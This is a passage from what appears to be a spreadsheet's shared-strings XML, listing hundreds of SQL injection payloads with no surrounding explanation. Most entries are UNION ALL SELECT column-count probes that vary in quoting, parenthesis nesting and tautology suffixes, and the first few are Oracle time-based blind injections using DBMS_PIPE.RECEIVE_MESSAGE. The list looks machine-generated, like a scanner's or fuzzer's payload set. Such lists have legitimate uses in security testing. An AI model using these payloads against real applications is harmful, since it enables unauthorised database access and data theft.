    <t>"  )  )   AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (  "OaLe" LIKE "OaLe</t>
  </si>
  <si>
    <t>"  )  )   )  AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND   (  (   ( "vtie" LIKE "vtie</t>
  </si>
  <si>
    <t>" AND 8214 = DBMS_PIPE.RECEIVE_MESSAGE ( CHR ( 98 ) ||CHR ( 105 ) ||CHR ( 106 ) ||CHR ( 71 ) ,5 ) -- AND "EoGh" LIKE "EoGh</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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UNION ALL SELECT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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( 5529 = 5529</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 9161 = 9161</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2366 = 2366</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8301 = 8301</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2067 = 2067</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8792 = 8792</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL# AND   (  (  5274 = 5274</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  2838 = 2838</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  4805 = 4805</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2377 = 2377</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3335 = 3335</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6082 = 6082</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  592 = 592</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  8029 = 8029</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( 6496 = 6496</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 2621 = 2621</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3429 = 3429</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2060 = 2060</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 1078 = 1078</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7790 = 7790</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5473 = 5473</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7050 = 7050</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 'lZum' = 'lZum</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( 'iBtS' = 'iBtS</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'FLTa' = 'FLTa</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'aYXk' = 'aYXk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'tTHS' = 'tTHS</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'zfnX' = 'zfnX</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ZwAP' = 'ZwAP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  'EHkP' = 'EHkP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  'nlTw' = 'nlTw</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'zUxP' = 'zUxP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'SExR' = 'SExR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'eZyA' = 'eZyA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HEMD' = 'HEMD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'aPEZ' = 'aPEZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( 'qIam' = 'qIam</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 'NQFt' = 'NQFt</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'QqSw' = 'QqSw</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'UPKL' = 'UPKL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'SVHv' = 'SVHv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'bKUm' = 'bKUm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'eBka' = 'eBka</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'NsaY' = 'NsaY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'fwZH' = 'fwZH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'FgLj' = 'FgLj</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'fpRN' = 'fpRN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'TSuW' = 'TSuW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'bNtJ' = 'bNtJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'QaHM' = 'QaHM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'qXDl' = 'qXDl</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL# AND  ( 'XHxh' LIKE 'XHxh</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 'oIyR' LIKE 'oIyR</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( 'buZK' LIKE 'buZK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Zgbe' LIKE 'Zgbe</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'eVgb' LIKE 'eVgb</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'TGSt' LIKE 'TGSt</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ZnOw' LIKE 'ZnOw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ngsl' LIKE 'ngsl</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  'zmPi' LIKE 'zmPi</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  'KZcv' LIKE 'KZcv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  'DEyA' LIKE 'DEyA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'GDCt' LIKE 'GDCt</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'vJZt' LIKE 'vJZt</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Rcjd' LIKE 'Rcjd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ACgx' LIKE 'ACgx</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'abYX' LIKE 'abYX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( 'cKqd' LIKE 'cKqd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( 'Utjd' LIKE 'Utjd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 'GURC' LIKE 'GURC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'YUuH' LIKE 'YUuH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Aomr' LIKE 'Aomr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'YVDB' LIKE 'YVDB</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'pPHu' LIKE 'pPHu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'isvX' LIKE 'isvX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'iQuJ' LIKE 'iQuJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL# AND 'GFfC' LIKE 'GFfC</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'AFra' LIKE 'AFra</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'vlNZ' LIKE 'vlNZ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'rcJD' LIKE 'rcJD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'uYoY' LIKE 'uYoY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'BOPV' LIKE 'BOPV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'bpBS' LIKE 'bpBS</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'AIhW' LIKE 'AIhW</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( "eOdb" = "eOdb</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( "Btll" = "Btll</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "RHTP" = "RHTP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "EcnN" = "EcnN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "GfLT" = "GfLT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "gVnT" = "gVnT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "iSFi" = "iSFi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  "TZeM" = "TZeM</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  "uTSG" = "uTSG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "HgxQ" = "HgxQ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "QrFO" = "QrFO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "lRbG" = "lRbG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "oJUT" = "oJUT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ysCo" = "ysCo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( "BXki" = "BXki</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( "kEiZ" = "kEiZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "KnpP" = "KnpP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "faUS" = "faUS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "TaKs" = "TaKs</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Ovuu" = "Ovuu</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "IntS" = "IntS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WlQq" = "WlQq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL# AND "MPtY" = "MPtY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND "vBbX" = "vBbX</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND "sZNT" = "sZNT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Aiev" = "Aiev</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "EEgk" = "EEgk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Ifmr" = "Ifmr</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "BLZo" = "BLZo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL# AND  ( "HNVP" LIKE "HNVP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( "zUeb" LIKE "zUeb</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( "eMdM" LIKE "eMdM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "MdwJ" LIKE "MdwJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ebNp" LIKE "ebNp</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "BIHQ" LIKE "BIHQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qGhs" LIKE "qGhs</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ZqVy" LIKE "ZqVy</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  "bQCa" LIKE "bQCa</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  "MzKt" LIKE "MzKt</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  "ikww" LIKE "ikww</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "QrUA" LIKE "QrUA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Uiou" LIKE "Uiou</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "DviW" LIKE "DviW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "HkbS" LIKE "HkbS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "TmTe" LIKE "TmTe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( "YsTQ" LIKE "YsTQ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( "hLWc" LIKE "hLWc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( "DonX" LIKE "DonX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "QIWH" LIKE "QIWH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "NlpO" LIKE "NlpO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "JTSr" LIKE "JTSr</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "MHwv" LIKE "MHwv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "eWEd" LIKE "eWEd</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "McQB" LIKE "McQB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL# AND "ALWo" LIKE "ALWo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL# AND "vcqg" LIKE "vcqg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND "HOyK" LIKE "HOyK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND "bdyi" LIKE "bdyi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "QWcc" LIKE "QWcc</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "aUbi" LIKE "aUbi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "FEPU" LIKE "FEPU</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "YUrB" LIKE "YUrB</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( 9545 = 9545</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3735 = 3735</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 470 = 470</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 819 = 819</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4875 = 4875</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6849 = 6849</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  2587 = 2587</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  7095 = 7095</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  8676 = 8676</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1095 = 1095</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  428 = 428</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1325 = 1325</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1556 = 1556</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( 7727 = 7727</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( 9524 = 9524</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 2686 = 2686</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7386 = 7386</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3181 = 3181</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7701 = 7701</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5403 = 5403</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2906 = 2906</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2062 = 2062</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND  ( 'FTWv' = 'FTWv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'sAkG' = 'sAkG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'BSrm' = 'BSrm</t>
  </si>
  <si>
